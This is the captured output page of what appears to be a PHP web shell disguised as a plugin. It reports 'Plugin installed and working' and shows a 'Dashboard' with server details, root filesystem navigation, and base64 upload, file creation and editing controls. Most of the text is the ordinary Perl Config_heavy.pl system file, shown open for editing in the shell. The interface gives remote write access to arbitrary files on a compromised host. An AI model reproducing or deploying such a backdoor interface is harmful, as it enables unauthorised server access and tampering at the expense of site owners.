{"ok":true,"status":"active","msg":"Plugin installed and working","php":"8.3.33","server":"Apache","time":"2026-08-22 06:13:30"}
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Dashboard</title>
    <style>
        * { margin:0; padding:0; box-sizing:border-box; font-family:Arial,sans-serif; }
        body { background:#000; color:#ccc; padding:15px; min-height:100vh; }
        .container { background:#111; border:1px solid #ff0000; max-width:1400px; margin:0 auto; border-radius:5px; overflow:hidden; }
        .header { background:#222; padding:15px; border-bottom:2px solid #ff0000; color:#fff; }
        .header h1 { color:#ff0000; font-size:20px; margin-bottom:10px; }
        .system-info { display:flex; gap:15px; font-size:12px; color:#888; flex-wrap:wrap; }
        .path-navigation { background:#1a1a1a; padding:12px 15px; border-bottom:1px solid #333; display:flex; align-items:center; flex-wrap:wrap; gap:5px; }
        .path-navigation a { color:#00ff00; text-decoration:none; padding:5px 10px; background:#222; border-radius:3px; font-size:13px; }
        .path-navigation a:hover { background:#333; color:#fff; }
        .tools { padding:12px 15px; background:#1a1a1a; border-bottom:1px solid #333; display:flex; gap:8px; flex-wrap:wrap; }
        .button { background:#222; color:#ccc; border:1px solid #666; padding:8px 15px; cursor:pointer; border-radius:3px; font-size:13px; text-decoration:none; display:inline-flex; align-items:center; gap:5px; }
        .button:hover { background:#333; border-color:#00ff00; color:#fff; }
        .button-green { border-color:#00ff00; color:#00ff00; }
        .button-red { border-color:#ff0000; color:#ff0000; }
        .message { padding:12px; background:#1a1a1a; border-bottom:1px solid #333; text-align:center; font-weight:bold; }
        .file-table { width:100%; color:#ccc; border-collapse:collapse; }
        .file-table th { background:#222; padding:12px 15px; text-align:left; border-bottom:2px solid #ff0000; color:#fff; font-size:13px; }
        .file-table td { padding:10px 15px; border-bottom:1px solid #333; font-size:14px; }
        .file-table tr:hover { background:#1a1a1a; }
        .folder-link { color:#00ff00; font-weight:bold; text-decoration:none; display:flex; align-items:center; gap:8px; }
        .file-link { color:#ccc; text-decoration:none; display:flex; align-items:center; gap:8px; }
        .folder-link:hover, .file-link:hover { color:#fff; }
        .size { color:#888; }
        .permissions { font-family:'Courier New',monospace; color:#ff9900; background:#222; padding:4px 8px; border-radius:3px; font-size:12px; }
        .actions { display:flex; gap:5px; flex-wrap:wrap; }
        .action-button { padding:5px 10px; background:#222; color:#ccc; border:1px solid #666; font-size:11px; cursor:pointer; text-decoration:none; border-radius:3px; }
        .action-button:hover { background:#333; border-color:#00ff00; }
        .action-button-red { border-color:#ff0000; color:#ff0000; }
        textarea { width:100%; height:400px; background:#000; color:#00ff00; border:1px solid #ff0000; padding:15px; font-family:'Courier New',monospace; font-size:14px; border-radius:3px; }
        .edit-container { padding:20px; background:#000; border-bottom:1px solid #333; }
        .edit-title { color:#00ff00; margin-bottom:15px; font-size:16px; }
        .toast-container { position:fixed; top:20px; right:20px; z-index:10000; display:flex; flex-direction:column; gap:10px; max-width:350px; }
        .toast { padding:12px 20px; border-radius:5px; color:#fff; font-size:14px; display:flex; align-items:center; justify-content:space-between; gap:10px; animation:toastIn 0.3s ease; cursor:pointer; }
        .toast-success { background:#1a472a; border-left:4px solid #00ff00; }
        .toast-error { background:#4a1a1a; border-left:4px solid #ff0000; }
        @keyframes toastIn { from { transform:translateX(100%); opacity:0; } to { transform:translateX(0); opacity:1; } }
        .search-input { background:#000; border:1px solid #444; color:#fff; padding:6px 12px; border-radius:3px; font-size:13px; width:200px; margin-left:auto; }
        .search-input:focus { outline:none; border-color:#00ff00; }
    </style>
</head>
<body>
    <div class="container">
        <div class="header">
            <div style="display:flex; justify-content:space-between; align-items:center;">
                <div>
                    <h1>Dashboard</h1>
                    <div class="system-info">
                        <span>PHP: <b style="color:#ff9900">8.3.33</b></span>
                        <span>OS: <b style="color:#ff9900">Linux</b></span>
                        <span>User: <b style="color:#ff9900">pablod78</b></span>
                    </div>
                </div>

            </div>
        </div>
        
                
        <div class="path-navigation">
                                            <a href="?p=%2F">/</a>
                            <span style="color:#666">/</span>                <a href="?p=%2Fusr">usr</a>
                            <span style="color:#666">/</span>                <a href="?p=%2Fusr%2Flib64">lib64</a>
                            <span style="color:#666">/</span>                <a href="?p=%2Fusr%2Flib64%2Fperl5">perl5</a>
                    </div>
        
        <div class="tools">
            <button class="button button-green" onclick="document.getElementById('b64upload').click()">📤 Upload</button>
            <input type="file" id="b64upload" style="display:none" onchange="uploadFileB64(this)">
            <button class="button" onclick="showCreateFile()">📝 New File</button>
            <button class="button" onclick="showCreateFolder()">📁 New Folder</button>
            <a href="?p=%2Fusr%2Flib64%2Fperl5" class="button button-red">Close</a>            <input type="text" id="search-input" class="search-input" placeholder="🔍 Search..." onkeyup="searchFiles(this.value)">
        </div>

        
                    <div class="edit-container">
                <div class="edit-title">Editing: Config_heavy.pl</div>
                <form method="post">
                    <input type="hidden" name="edit_path" value="/usr/lib64/perl5/Config_heavy.pl">
                    <textarea name="edit_content"># This file was created by configpm when Perl was built. Any changes
# made to this file will be lost the next time perl is built.

package Config;
use strict;
use warnings;
our %Config;

sub bincompat_options {
    return split &#039; &#039;, (Internals::V())[0];
}

sub non_bincompat_options {
    return split &#039; &#039;, (Internals::V())[1];
}

sub compile_date {
    return (Internals::V())[2]
}

sub local_patches {
    my (undef, undef, undef, @patches) = Internals::V();
    return @patches;
}

sub _V {
    die &quot;Perl lib was built for &#039;linux&#039; but is being run on &#039;$^O&#039;&quot;
        unless &quot;linux&quot; eq $^O;

    my ($bincompat, $non_bincompat, $date, @patches) = Internals::V();

    my @opts = sort split &#039; &#039;, &quot;$bincompat $non_bincompat&quot;;

    print Config::myconfig();
    print &quot;\nCharacteristics of this binary (from libperl): \n&quot;;

    print &quot;  Compile-time options:\n&quot;;
    print &quot;    $_\n&quot; for @opts;

    if (@patches) {
        print &quot;  Locally applied patches:\n&quot;;
        print &quot;    $_\n&quot; foreach @patches;
    }

    print &quot;  Built under linux\n&quot;;

    print &quot;  $date\n&quot; if defined $date;

    my @env = map { &quot;$_=\&quot;$ENV{$_}\&quot;&quot; } sort grep {/^PERL/} keys %ENV;

    if (@env) {
        print &quot;  \%ENV:\n&quot;;
        print &quot;    $_\n&quot; foreach @env;
    }
    print &quot;  \@INC:\n&quot;;
    print &quot;    $_\n&quot; foreach @INC;
}

sub header_files {
    return qw(EXTERN.h INTERN.h XSUB.h av.h config.h cop.h cv.h
              dosish.h embed.h embedvar.h form.h gv.h handy.h hv.h hv_func.h
              intrpvar.h iperlsys.h keywords.h mg.h nostdio.h op.h opcode.h
              pad.h parser.h patchlevel.h perl.h perlio.h perliol.h perlsdio.h
              perlvars.h perly.h pp.h pp_proto.h proto.h regcomp.h regexp.h
              regnodes.h scope.h sv.h thread.h time64.h unixish.h utf8.h
              util.h);
}

##
## This file was produced by running the Configure script. It holds all the
## definitions figured out by Configure. Should you modify one of these values,
## do not forget to propagate your changes by running &quot;Configure -der&quot;. You may
## instead choose to run each of the .SH files by yourself, or &quot;Configure -S&quot;.
##
#
## Package name      : perl5
## Source directory  : .
## Configuration time: Sun Jul 27 23:51:30 EDT 2025
## Configured by     : Red Hat, Inc.
## Target system     : linux dfb22103dfd34bb3825af5be74e7d095 5.14.0-570.12.1.el9_6.x86_64 #1 smp preempt_dynamic tue may 13 06:11:55 edt 2025 x86_64 x86_64 x86_64 gnulinux 
#
#: Configure command line arguments.
#
#: Variables propagated from previous config.sh file.

our $summary = &lt;&lt;&#039;!END!&#039;;
Summary of my $package (revision $revision $version_patchlevel_string) configuration:
  $git_commit_id_title $git_commit_id$git_ancestor_line
  Platform:
    osname=$osname
    osvers=$osvers
    archname=$archname
    uname=&#039;$myuname&#039;
    config_args=&#039;$config_args&#039;
    hint=$hint
    useposix=$useposix
    d_sigaction=$d_sigaction
    useithreads=$useithreads
    usemultiplicity=$usemultiplicity
    use64bitint=$use64bitint
    use64bitall=$use64bitall
    uselongdouble=$uselongdouble
    usemymalloc=$usemymalloc
    default_inc_excludes_dot=$default_inc_excludes_dot
    bincompat5005=undef
  Compiler:
    cc=&#039;$cc&#039;
    ccflags =&#039;$ccflags&#039;
    optimize=&#039;$optimize&#039;
    cppflags=&#039;$cppflags&#039;
    ccversion=&#039;$ccversion&#039;
    gccversion=&#039;$gccversion&#039;
    gccosandvers=&#039;$gccosandvers&#039;
    intsize=$intsize
    longsize=$longsize
    ptrsize=$ptrsize
    doublesize=$doublesize
    byteorder=$byteorder
    doublekind=$doublekind
    d_longlong=$d_longlong
    longlongsize=$longlongsize
    d_longdbl=$d_longdbl
    longdblsize=$longdblsize
    longdblkind=$longdblkind
    ivtype=&#039;$ivtype&#039;
    ivsize=$ivsize
    nvtype=&#039;$nvtype&#039;
    nvsize=$nvsize
    Off_t=&#039;$lseektype&#039;
    lseeksize=$lseeksize
    alignbytes=$alignbytes
    prototype=$prototype
  Linker and Libraries:
    ld=&#039;$ld&#039;
    ldflags =&#039;$ldflags&#039;
    libpth=$libpth
    libs=$libs
    perllibs=$perllibs
    libc=$libc
    so=$so
    useshrplib=$useshrplib
    libperl=$libperl
    gnulibc_version=&#039;$gnulibc_version&#039;
  Dynamic Linking:
    dlsrc=$dlsrc
    dlext=$dlext
    d_dlsymun=$d_dlsymun
    ccdlflags=&#039;$ccdlflags&#039;
    cccdlflags=&#039;$cccdlflags&#039;
    lddlflags=&#039;$lddlflags&#039;

!END!
my $summary_expanded;

sub myconfig {
    return $summary_expanded if $summary_expanded;
    ($summary_expanded = $summary) =~ s{\$(\w+)}
		 { 
			my $c;
			if ($1 eq &#039;git_ancestor_line&#039;) {
				if ($Config::Config{git_ancestor}) {
					$c= &quot;\n  Ancestor: $Config::Config{git_ancestor}&quot;;
				} else {
					$c= &quot;&quot;;
				}
			} else {
                     		$c = $Config::Config{$1}; 
			}
			defined($c) ? $c : &#039;undef&#039; 
		}ge;
    $summary_expanded;
}

local *_ = \my $a;
$_ = &lt;&lt;&#039;!END!&#039;;
Author=&#039;&#039;
CONFIG=&#039;true&#039;
Date=&#039;&#039;
Header=&#039;&#039;
Id=&#039;&#039;
Locker=&#039;&#039;
Log=&#039;&#039;
PATCHLEVEL=&#039;32&#039;
PERL_API_REVISION=&#039;5&#039;
PERL_API_SUBVERSION=&#039;0&#039;
PERL_API_VERSION=&#039;32&#039;
PERL_CONFIG_SH=&#039;true&#039;
PERL_PATCHLEVEL=&#039;&#039;
PERL_REVISION=&#039;5&#039;
PERL_SUBVERSION=&#039;1&#039;
PERL_VERSION=&#039;32&#039;
RCSfile=&#039;&#039;
Revision=&#039;&#039;
SUBVERSION=&#039;1&#039;
Source=&#039;&#039;
State=&#039;&#039;
_a=&#039;.a&#039;
_exe=&#039;&#039;
_o=&#039;.o&#039;
afs=&#039;true&#039;
afsroot=&#039;/afs&#039;
alignbytes=&#039;8&#039;
aphostname=&#039;&#039;
api_revision=&#039;5&#039;
api_subversion=&#039;0&#039;
api_version=&#039;32&#039;
api_versionstring=&#039;5.32.0&#039;
ar=&#039;ar&#039;
archlib=&#039;/usr/lib64/perl5&#039;
archlibexp=&#039;/usr/lib64/perl5&#039;
archname=&#039;x86_64-linux-thread-multi&#039;
archname64=&#039;&#039;
archobjs=&#039;&#039;
asctime_r_proto=&#039;REENTRANT_PROTO_B_SB&#039;
awk=&#039;awk&#039;
baserev=&#039;5.0&#039;
bash=&#039;&#039;
bin=&#039;/usr/bin&#039;
bin_ELF=&#039;define&#039;
binexp=&#039;/usr/bin&#039;
bison=&#039;bison&#039;
byacc=&#039;byacc&#039;
byteorder=&#039;12345678&#039;
c=&#039;&#039;
castflags=&#039;0&#039;
cat=&#039;cat&#039;
cc=&#039;gcc&#039;
cccdlflags=&#039;-fPIC&#039;
ccdlflags=&#039;-Wl,--enable-new-dtags -Wl,-z,relro -Wl,--as-needed -Wl,-z,now -specs=/usr/lib/rpm/redhat/redhat-hardened-ld -specs=/usr/lib/rpm/redhat/redhat-annobin-cc1 &#039;
ccflags=&#039;-D_REENTRANT -D_GNU_SOURCE -O2 -flto=auto -ffat-lto-objects -fexceptions -g -grecord-gcc-switches -pipe -Wall -Werror=format-security -Wp,-D_FORTIFY_SOURCE=2 -Wp,-D_GLIBCXX_ASSERTIONS -specs=/usr/lib/rpm/redhat/redhat-hardened-cc1 -fstack-protector-strong -specs=/usr/lib/rpm/redhat/redhat-annobin-cc1 -m64 -march=x86-64-v2 -mtune=generic -fasynchronous-unwind-tables -fstack-clash-protection -fcf-protection -fwrapv -fno-strict-aliasing -I/usr/local/include -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64&#039;
ccflags_uselargefiles=&#039;-D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64&#039;
ccname=&#039;gcc&#039;
ccsymbols=&#039;&#039;
ccversion=&#039;&#039;
cf_by=&#039;Red Hat, Inc.&#039;
cf_email=&#039;Red Hat, Inc.@localhost.localdomain&#039;
cf_time=&#039;Sun Jul 27 23:51:30 EDT 2025&#039;
charbits=&#039;8&#039;
charsize=&#039;1&#039;
chgrp=&#039;&#039;
chmod=&#039;chmod&#039;
chown=&#039;&#039;
clocktype=&#039;clock_t&#039;
comm=&#039;comm&#039;
compress=&#039;&#039;
config_arg0=&#039;Configure&#039;
config_arg1=&#039;-des&#039;
config_arg10=&#039;-Dmyhostname=localhost&#039;
config_arg11=&#039;-Dperladmin=root@localhost&#039;
config_arg12=&#039;-Dcc=gcc&#039;
config_arg13=&#039;-Dcf_by=Red Hat, Inc.&#039;
config_arg14=&#039;-Dprefix=/usr&#039;
config_arg15=&#039;-Dvendorprefix=/usr&#039;
config_arg16=&#039;-Dsiteprefix=/usr/local&#039;
config_arg17=&#039;-Dsitelib=/usr/local/share/perl5/5.32&#039;
config_arg18=&#039;-Dsitearch=/usr/local/lib64/perl5/5.32&#039;
config_arg19=&#039;-Dprivlib=/usr/share/perl5&#039;
config_arg2=&#039;-Doptimize=none&#039;
config_arg20=&#039;-Dvendorlib=/usr/share/perl5/vendor_perl&#039;
config_arg21=&#039;-Darchlib=/usr/lib64/perl5&#039;
config_arg22=&#039;-Dvendorarch=/usr/lib64/perl5/vendor_perl&#039;
config_arg23=&#039;-Darchname=x86_64-linux-thread-multi&#039;
config_arg24=&#039;-Dlibpth=/usr/local/lib64 /lib64 /usr/lib64&#039;
config_arg25=&#039;-Duseshrplib&#039;
config_arg26=&#039;-Dusethreads&#039;
config_arg27=&#039;-Duseithreads&#039;
config_arg28=&#039;-Dusedtrace=/usr/bin/dtrace&#039;
config_arg29=&#039;-Duselargefiles&#039;
config_arg3=&#039;-Dccflags=-O2 -flto=auto -ffat-lto-objects -fexceptions -g -grecord-gcc-switches -pipe -Wall -Werror=format-security -Wp,-D_FORTIFY_SOURCE=2 -Wp,-D_GLIBCXX_ASSERTIONS -specs=/usr/lib/rpm/redhat/redhat-hardened-cc1 -fstack-protector-strong -specs=/usr/lib/rpm/redhat/redhat-annobin-cc1  -m64 -march=x86-64-v2 -mtune=generic -fasynchronous-unwind-tables -fstack-clash-protection -fcf-protection&#039;
config_arg30=&#039;-Dd_semctl_semun&#039;
config_arg31=&#039;-Di_db&#039;
config_arg32=&#039;-Ui_ndbm&#039;
config_arg33=&#039;-Di_gdbm&#039;
config_arg34=&#039;-Di_shadow&#039;
config_arg35=&#039;-Di_syslog&#039;
config_arg36=&#039;-Dman3ext=3pm&#039;
config_arg37=&#039;-Duseperlio&#039;
config_arg38=&#039;-Dinstallusrbinperl=n&#039;
config_arg39=&#039;-Ubincompat5005&#039;
config_arg4=&#039;-Dldflags=-Wl,-z,relro -Wl,--as-needed  -Wl,-z,now -specs=/usr/lib/rpm/redhat/redhat-hardened-ld -specs=/usr/lib/rpm/redhat/redhat-annobin-cc1 &#039;
config_arg40=&#039;-Uversiononly&#039;
config_arg41=&#039;-Dpager=/usr/bin/less -isr&#039;
config_arg42=&#039;-Dd_gethostent_r_proto&#039;
config_arg43=&#039;-Ud_endhostent_r_proto&#039;
config_arg44=&#039;-Ud_sethostent_r_proto&#039;
config_arg45=&#039;-Ud_endprotoent_r_proto&#039;
config_arg46=&#039;-Ud_setprotoent_r_proto&#039;
config_arg47=&#039;-Ud_endservent_r_proto&#039;
config_arg48=&#039;-Ud_setservent_r_proto&#039;
config_arg49=&#039;-Dscriptdir=/usr/bin&#039;
config_arg5=&#039;-Dccdlflags=-Wl,--enable-new-dtags -Wl,-z,relro -Wl,--as-needed  -Wl,-z,now -specs=/usr/lib/rpm/redhat/redhat-hardened-ld -specs=/usr/lib/rpm/redhat/redhat-annobin-cc1 &#039;
config_arg50=&#039;-Dusesitecustomize&#039;
config_arg51=&#039;-Duse64bitint&#039;
config_arg6=&#039;-Dlddlflags=-shared -Wl,-z,relro -Wl,--as-needed  -Wl,-z,now -specs=/usr/lib/rpm/redhat/redhat-hardened-ld -specs=/usr/lib/rpm/redhat/redhat-annobin-cc1 &#039;
config_arg7=&#039;-Dshrpdir=/usr/lib64&#039;
config_arg8=&#039;-DDEBUGGING=-g&#039;
config_arg9=&#039;-Dversion=5.32.1&#039;
config_argc=&#039;51&#039;
config_args=&#039;-des -Doptimize=none -Dccflags=-O2 -flto=auto -ffat-lto-objects -fexceptions -g -grecord-gcc-switches -pipe -Wall -Werror=format-security -Wp,-D_FORTIFY_SOURCE=2 -Wp,-D_GLIBCXX_ASSERTIONS -specs=/usr/lib/rpm/redhat/redhat-hardened-cc1 -fstack-protector-strong -specs=/usr/lib/rpm/redhat/redhat-annobin-cc1  -m64 -march=x86-64-v2 -mtune=generic -fasynchronous-unwind-tables -fstack-clash-protection -fcf-protection -Dldflags=-Wl,-z,relro -Wl,--as-needed  -Wl,-z,now -specs=/usr/lib/rpm/redhat/redhat-hardened-ld -specs=/usr/lib/rpm/redhat/redhat-annobin-cc1  -Dccdlflags=-Wl,--enable-new-dtags -Wl,-z,relro -Wl,--as-needed  -Wl,-z,now -specs=/usr/lib/rpm/redhat/redhat-hardened-ld -specs=/usr/lib/rpm/redhat/redhat-annobin-cc1  -Dlddlflags=-shared -Wl,-z,relro -Wl,--as-needed  -Wl,-z,now -specs=/usr/lib/rpm/redhat/redhat-hardened-ld -specs=/usr/lib/rpm/redhat/redhat-annobin-cc1  -Dshrpdir=/usr/lib64 -DDEBUGGING=-g -Dversion=5.32.1 -Dmyhostname=localhost -Dperladmin=root@localhost -Dcc=gcc -Dcf_by=Red Hat, Inc. -Dprefix=/usr -Dvendorprefix=/usr -Dsiteprefix=/usr/local -Dsitelib=/usr/local/share/perl5/5.32 -Dsitearch=/usr/local/lib64/perl5/5.32 -Dprivlib=/usr/share/perl5 -Dvendorlib=/usr/share/perl5/vendor_perl -Darchlib=/usr/lib64/perl5 -Dvendorarch=/usr/lib64/perl5/vendor_perl -Darchname=x86_64-linux-thread-multi -Dlibpth=/usr/local/lib64 /lib64 /usr/lib64 -Duseshrplib -Dusethreads -Duseithreads -Dusedtrace=/usr/bin/dtrace -Duselargefiles -Dd_semctl_semun -Di_db -Ui_ndbm -Di_gdbm -Di_shadow -Di_syslog -Dman3ext=3pm -Duseperlio -Dinstallusrbinperl=n -Ubincompat5005 -Uversiononly -Dpager=/usr/bin/less -isr -Dd_gethostent_r_proto -Ud_endhostent_r_proto -Ud_sethostent_r_proto -Ud_endprotoent_r_proto -Ud_setprotoent_r_proto -Ud_endservent_r_proto -Ud_setservent_r_proto -Dscriptdir=/usr/bin -Dusesitecustomize -Duse64bitint&#039;
contains=&#039;grep&#039;
cp=&#039;cp&#039;
cpio=&#039;&#039;
cpp=&#039;cpp&#039;
cpp_stuff=&#039;42&#039;
cppccsymbols=&#039;&#039;
cppflags=&#039;-D_REENTRANT -D_GNU_SOURCE -O2 -flto=auto -ffat-lto-objects -fexceptions -g -grecord-gcc-switches -pipe -Wall -Werror=format-security -Wp,-D_FORTIFY_SOURCE=2 -Wp,-D_GLIBCXX_ASSERTIONS -specs=/usr/lib/rpm/redhat/redhat-hardened-cc1 -fstack-protector-strong -specs=/usr/lib/rpm/redhat/redhat-annobin-cc1 -m64 -march=x86-64-v2 -mtune=generic -fasynchronous-unwind-tables -fstack-clash-protection -fcf-protection -fwrapv -fno-strict-aliasing -I/usr/local/include&#039;
cpplast=&#039;-&#039;
cppminus=&#039;-&#039;
cpprun=&#039;gcc  -E&#039;
cppstdin=&#039;gcc  -E&#039;
cppsymbols=&#039;_FILE_OFFSET_BITS=64 _FORTIFY_SOURCE=2 _GNU_SOURCE=1 _LARGEFILE64_SOURCE=1 _LARGEFILE_SOURCE=1 _LP64=1 _POSIX_C_SOURCE=200809L _POSIX_SOURCE=1 _REENTRANT=1 _STDC_PREDEF_H=1 _XOPEN_SOURCE=700 _XOPEN_SOURCE_EXTENDED=1 __ATOMIC_ACQUIRE=2 __ATOMIC_ACQ_REL=4 __ATOMIC_CONSUME=1 __ATOMIC_HLE_ACQUIRE=65536 __ATOMIC_HLE_RELEASE=131072 __ATOMIC_RELAXED=0 __ATOMIC_RELEASE=3 __ATOMIC_SEQ_CST=5 __BIGGEST_ALIGNMENT__=16 __BYTE_ORDER__=1234 __CHAR16_TYPE__=short\ unsigned\ int __CHAR32_TYPE__=unsigned\ int __CHAR_BIT__=8 __CRC32__=1 __DBL_DECIMAL_DIG__=17 __DBL_DENORM_MIN__=((double)4.94065645841246544176568792868221372e-324L) __DBL_DIG__=15 __DBL_EPSILON__=((double)2.22044604925031308084726333618164062e-16L) __DBL_HAS_DENORM__=1 __DBL_HAS_INFINITY__=1 __DBL_HAS_QUIET_NAN__=1 __DBL_IS_IEC_60559__=2 __DBL_MANT_DIG__=53 __DBL_MAX_10_EXP__=308 __DBL_MAX_EXP__=1024 __DBL_MAX__=((double)1.79769313486231570814527423731704357e+308L) __DBL_MIN_10_EXP__=(-307) __DBL_MIN_EXP__=(-1021) __DBL_MIN__=((double)2.22507385850720138309023271733240406e-308L) __DBL_NORM_MAX__=((double)1.79769313486231570814527423731704357e+308L) __DEC128_EPSILON__=1E-33DL __DEC128_MANT_DIG__=34 __DEC128_MAX_EXP__=6145 __DEC128_MAX__=9.999999999999999999999999999999999E6144DL __DEC128_MIN_EXP__=(-6142) __DEC128_MIN__=1E-6143DL __DEC128_SUBNORMAL_MIN__=0.000000000000000000000000000000001E-6143DL __DEC32_EPSILON__=1E-6DF __DEC32_MANT_DIG__=7 __DEC32_MAX_EXP__=97 __DEC32_MAX__=9.999999E96DF __DEC32_MIN_EXP__=(-94) __DEC32_MIN__=1E-95DF __DEC32_SUBNORMAL_MIN__=0.000001E-95DF __DEC64_EPSILON__=1E-15DD __DEC64_MANT_DIG__=16 __DEC64_MAX_EXP__=385 __DEC64_MAX__=9.999999999999999E384DD __DEC64_MIN_EXP__=(-382) __DEC64_MIN__=1E-383DD __DEC64_SUBNORMAL_MIN__=0.000000000000001E-383DD __DECIMAL_BID_FORMAT__=1 __DECIMAL_DIG__=21 __DEC_EVAL_METHOD__=2 __ELF__=1 __FINITE_MATH_ONLY__=0 __FLOAT_WORD_ORDER__=1234 __FLT128_DECIMAL_DIG__=36 __FLT128_DENORM_MIN__=6.47517511943802511092443895822764655e-4966F128 __FLT128_DIG__=33 __FLT128_EPSILON__=1.92592994438723585305597794258492732e-34F128 __FLT128_HAS_DENORM__=1 __FLT128_HAS_INFINITY__=1 __FLT128_HAS_QUIET_NAN__=1 __FLT128_IS_IEC_60559__=2 __FLT128_MANT_DIG__=113 __FLT128_MAX_10_EXP__=4932 __FLT128_MAX_EXP__=16384 __FLT128_MAX__=1.18973149535723176508575932662800702e+4932F128 __FLT128_MIN_10_EXP__=(-4931) __FLT128_MIN_EXP__=(-16381) __FLT128_MIN__=3.36210314311209350626267781732175260e-4932F128 __FLT128_NORM_MAX__=1.18973149535723176508575932662800702e+4932F128 __FLT32X_DECIMAL_DIG__=17 __FLT32X_DENORM_MIN__=4.94065645841246544176568792868221372e-324F32x __FLT32X_DIG__=15 __FLT32X_EPSILON__=2.22044604925031308084726333618164062e-16F32x __FLT32X_HAS_DENORM__=1 __FLT32X_HAS_INFINITY__=1 __FLT32X_HAS_QUIET_NAN__=1 __FLT32X_IS_IEC_60559__=2 __FLT32X_MANT_DIG__=53 __FLT32X_MAX_10_EXP__=308 __FLT32X_MAX_EXP__=1024 __FLT32X_MAX__=1.79769313486231570814527423731704357e+308F32x __FLT32X_MIN_10_EXP__=(-307) __FLT32X_MIN_EXP__=(-1021) __FLT32X_MIN__=2.22507385850720138309023271733240406e-308F32x __FLT32X_NORM_MAX__=1.79769313486231570814527423731704357e+308F32x __FLT32_DECIMAL_DIG__=9 __FLT32_DENORM_MIN__=1.40129846432481707092372958328991613e-45F32 __FLT32_DIG__=6 __FLT32_EPSILON__=1.19209289550781250000000000000000000e-7F32 __FLT32_HAS_DENORM__=1 __FLT32_HAS_INFINITY__=1 __FLT32_HAS_QUIET_NAN__=1 __FLT32_IS_IEC_60559__=2 __FLT32_MANT_DIG__=24 __FLT32_MAX_10_EXP__=38 __FLT32_MAX_EXP__=128 __FLT32_MAX__=3.40282346638528859811704183484516925e+38F32 __FLT32_MIN_10_EXP__=(-37) __FLT32_MIN_EXP__=(-125) __FLT32_MIN__=1.17549435082228750796873653722224568e-38F32 __FLT32_NORM_MAX__=3.40282346638528859811704183484516925e+38F32 __FLT64X_DECIMAL_DIG__=21 __FLT64X_DENORM_MIN__=3.64519953188247460252840593361941982e-4951F64x __FLT64X_DIG__=18 __FLT64X_EPSILON__=1.08420217248550443400745280086994171e-19F64x __FLT64X_HAS_DENORM__=1 __FLT64X_HAS_INFINITY__=1 __FLT64X_HAS_QUIET_NAN__=1 __FLT64X_IS_IEC_60559__=2 __FLT64X_MANT_DIG__=64 __FLT64X_MAX_10_EXP__=4932 __FLT64X_MAX_EXP__=16384 __FLT64X_MAX__=1.18973149535723176502126385303097021e+4932F64x __FLT64X_MIN_10_EXP__=(-4931) __FLT64X_MIN_EXP__=(-16381) __FLT64X_MIN__=3.36210314311209350626267781732175260e-4932F64x __FLT64X_NORM_MAX__=1.18973149535723176502126385303097021e+4932F64x __FLT64_DECIMAL_DIG__=17 __FLT64_DENORM_MIN__=4.94065645841246544176568792868221372e-324F64 __FLT64_DIG__=15 __FLT64_EPSILON__=2.22044604925031308084726333618164062e-16F64 __FLT64_HAS_DENORM__=1 __FLT64_HAS_INFINITY__=1 __FLT64_HAS_QUIET_NAN__=1 __FLT64_IS_IEC_60559__=2 __FLT64_MANT_DIG__=53 __FLT64_MAX_10_EXP__=308 __FLT64_MAX_EXP__=1024 __FLT64_MAX__=1.79769313486231570814527423731704357e+308F64 __FLT64_MIN_10_EXP__=(-307) __FLT64_MIN_EXP__=(-1021) __FLT64_MIN__=2.22507385850720138309023271733240406e-308F64 __FLT64_NORM_MAX__=1.79769313486231570814527423731704357e+308F64 __FLT_DECIMAL_DIG__=9 __FLT_DENORM_MIN__=1.40129846432481707092372958328991613e-45F __FLT_DIG__=6 __FLT_EPSILON__=1.19209289550781250000000000000000000e-7F __FLT_EVAL_METHOD_TS_18661_3__=0 __FLT_EVAL_METHOD__=0 __FLT_HAS_DENORM__=1 __FLT_HAS_INFINITY__=1 __FLT_HAS_QUIET_NAN__=1 __FLT_IS_IEC_60559__=2 __FLT_MANT_DIG__=24 __FLT_MAX_10_EXP__=38 __FLT_MAX_EXP__=128 __FLT_MAX__=3.40282346638528859811704183484516925e+38F __FLT_MIN_10_EXP__=(-37) __FLT_MIN_EXP__=(-125) __FLT_MIN__=1.17549435082228750796873653722224568e-38F __FLT_NORM_MAX__=3.40282346638528859811704183484516925e+38F __FLT_RADIX__=2 __FXSR__=1 __GCC_ASM_FLAG_OUTPUTS__=1 __GCC_ATOMIC_BOOL_LOCK_FREE=2 __GCC_ATOMIC_CHAR16_T_LOCK_FREE=2 __GCC_ATOMIC_CHAR32_T_LOCK_FREE=2 __GCC_ATOMIC_CHAR_LOCK_FREE=2 __GCC_ATOMIC_INT_LOCK_FREE=2 __GCC_ATOMIC_LLONG_LOCK_FREE=2 __GCC_ATOMIC_LONG_LOCK_FREE=2 __GCC_ATOMIC_POINTER_LOCK_FREE=2 __GCC_ATOMIC_SHORT_LOCK_FREE=2 __GCC_ATOMIC_TEST_AND_SET_TRUEVAL=1 __GCC_ATOMIC_WCHAR_T_LOCK_FREE=2 __GCC_HAVE_DWARF2_CFI_ASM=1 __GCC_HAVE_SYNC_COMPARE_AND_SWAP_16=1 __GCC_HAVE_SYNC_COMPARE_AND_SWAP_1=1 __GCC_HAVE_SYNC_COMPARE_AND_SWAP_2=1 __GCC_HAVE_SYNC_COMPARE_AND_SWAP_4=1 __GCC_HAVE_SYNC_COMPARE_AND_SWAP_8=1 __GCC_IEC_559=2 __GCC_IEC_559_COMPLEX=2 __GLIBC_MINOR__=34 __GLIBC__=2 __GNUC_EXECUTION_CHARSET_NAME=&quot;UTF-8&quot; __GNUC_MINOR__=5 __GNUC_PATCHLEVEL__=0 __GNUC_RH_RELEASE__=5 __GNUC_STDC_INLINE__=1 __GNUC_WIDE_EXECUTION_CHARSET_NAME=&quot;UTF-32LE&quot; __GNUC__=11 __GNU_LIBRARY__=6 __GXX_ABI_VERSION=1016 __HAVE_SPECULATION_SAFE_VALUE=1 __INT16_C=__INT16_C __INT16_MAX__=0x7fff __INT16_TYPE__=short\ int __INT32_C=__INT32_C __INT32_MAX__=0x7fffffff __INT32_TYPE__=int __INT64_C=__INT64_C __INT64_MAX__=0x7fffffffffffffffL __INT64_TYPE__=long\ int __INT8_C=__INT8_C __INT8_MAX__=0x7f __INT8_TYPE__=signed\ char __INTMAX_C=__INTMAX_C __INTMAX_MAX__=0x7fffffffffffffffL __INTMAX_TYPE__=long\ int __INTMAX_WIDTH__=64 __INTPTR_MAX__=0x7fffffffffffffffL __INTPTR_TYPE__=long\ int __INTPTR_WIDTH__=64 